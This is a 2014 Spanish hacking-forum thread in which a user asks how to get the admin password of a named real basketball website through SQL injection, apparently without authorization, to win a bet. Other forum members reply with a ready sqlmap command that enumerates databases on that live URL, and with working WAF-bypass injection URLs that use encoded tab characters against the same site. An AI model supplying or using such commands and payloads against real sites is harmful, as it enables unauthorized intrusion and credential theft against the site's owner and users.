elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  problema inyeccion SQL
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: problema inyeccion SQL  (Leído 2,934 veces)
BigByte

Desconectado Desconectado

Mensajes: 46


Ver Perfil WWW
problema inyeccion SQL
« en: 25 Enero 2014, 12:30 pm »

Hola chicos.

en esta ocasion tengo una duda sobre inyeccion sql con kali linux y sqlmap

He apostado con uno que lleva la web de la Federacion Espaola de Baloncesto (conocido mio) que no conseguia el pass del admin. la cosa es que he conseguido hacer una preinyeccion sql jejej.

consigo que sqlmap empiece a escanear y todo bien. pero luego me dice que la base de datos no es sql, cuando al poner la comilla en la url dice error de sintaxis, y sqlmap me dice que la ID es inyectable... algo estoy haciendo mal, a ver si me decis el que. pongo el desarrollo en pastebin y os doy el enlace.

la web objetivo es http://www.fabasket.com/noticia.php?id=1007

(y todas las noticias son inyectables, pero no lo consigo en ninguna)

aqui va lo que me arroja sqlmap

http://pastebin.com/Xnb2XNQi

espero podias ayudare pues no quiero perder la apuesta!! (un par de birras tampoco es importante por si alguien pregutna)

gracias   ;D
En línea

¿Eres de Zaragoza y necesitas Ordenador? ¿El que tienes te va lento? ¿Has tenido infección de malware? ¡¡No te preocupes, yo te lo arreglo!!
(Zaragoza, España)

http://www.bigbyte.webnode.es
ivancea96


Desconectado Desconectado

Mensajes: 3.412


ASMático


Ver Perfil WWW
Re: problema inyeccion SQL
« Respuesta #1 en: 25 Enero 2014, 16:43 pm »

La web filtra la id.
En línea

BigByte

Desconectado Desconectado

Mensajes: 46


Ver Perfil WWW
Re: problema inyeccion SQL
« Respuesta #2 en: 25 Enero 2014, 16:51 pm »

Y es posible saltarse eso.?? Me refiero hay alguna forma de bypassear esa protección para llevar a cabo la inyeccion sql o la web ya no es vulnerable ??


Agradecería un tutorial o una referencia , soy todo oídos !!

Gracias
En línea

¿Eres de Zaragoza y necesitas Ordenador? ¿El que tienes te va lento? ¿Has tenido infección de malware? ¡¡No te preocupes, yo te lo arreglo!!
(Zaragoza, España)

http://www.bigbyte.webnode.es
noopynoob

Desconectado Desconectado

Mensajes: 104



Ver Perfil
Re: problema inyeccion SQL
« Respuesta #3 en: 25 Enero 2014, 17:19 pm »

Y es posible saltarse eso.?? Me refiero hay alguna forma de bypassear esa protección para llevar a cabo la inyeccion sql o la web ya no es vulnerable ??


Agradecería un tutorial o una referencia , soy todo oídos !!

Gracias

sqlmap -u www.fabasket.com/noticia.php?id=1007 --dbms=oracle --risk=5 --level=5 --dbs
En línea

BigByte

Desconectado Desconectado

Mensajes: 46


Ver Perfil WWW
Re: problema inyeccion SQL
« Respuesta #4 en: 25 Enero 2014, 17:28 pm »

Gracias amigo . lo probaré y su funciona en habré ganado unas birras!! ;)
En línea

¿Eres de Zaragoza y necesitas Ordenador? ¿El que tienes te va lento? ¿Has tenido infección de malware? ¡¡No te preocupes, yo te lo arreglo!!
(Zaragoza, España)

http://www.bigbyte.webnode.es
dRak0

Desconectado Desconectado

Mensajes: 234


Ver Perfil WWW
Re: problema inyeccion SQL
« Respuesta #5 en: 26 Enero 2014, 00:12 am »

Buenas...

El bypass del WAF (Web Application Firewall):

http://www.fabasket.com/noticia.php?id=1007+order+by+1--&id=1007%09order%09by%091000--

http://www.fabasket.com/noticia.php?id=1007+order+by+1--&id=1007%09order%09by%0910--

El tema era que filtraba el espacio , busque otra alternativa y andubo.

No recomiendo utilizar herramientas , durante el aprendizaje.

Suerte!
« Última modificación: 26 Enero 2014, 00:15 am por jednak » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema Inyeccion SQL
Nivel Web
WiseHidden 8 4,492 Último mensaje 25 Diciembre 2010, 12:47 pm
por WiseHidden
problema Inyeccion DLL
Programación C/C++
tig0 4 2,288 Último mensaje 31 Julio 2011, 12:44 pm
por tig0
Problema inyeccion
ASM
rmdma() 2 3,094 Último mensaje 1 Marzo 2012, 13:43 pm
por _Enko
Problema con inyección SQL
Bugs y Exploits
janisorna 2 3,572 Último mensaje 11 Julio 2013, 18:44 pm
por janisorna
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines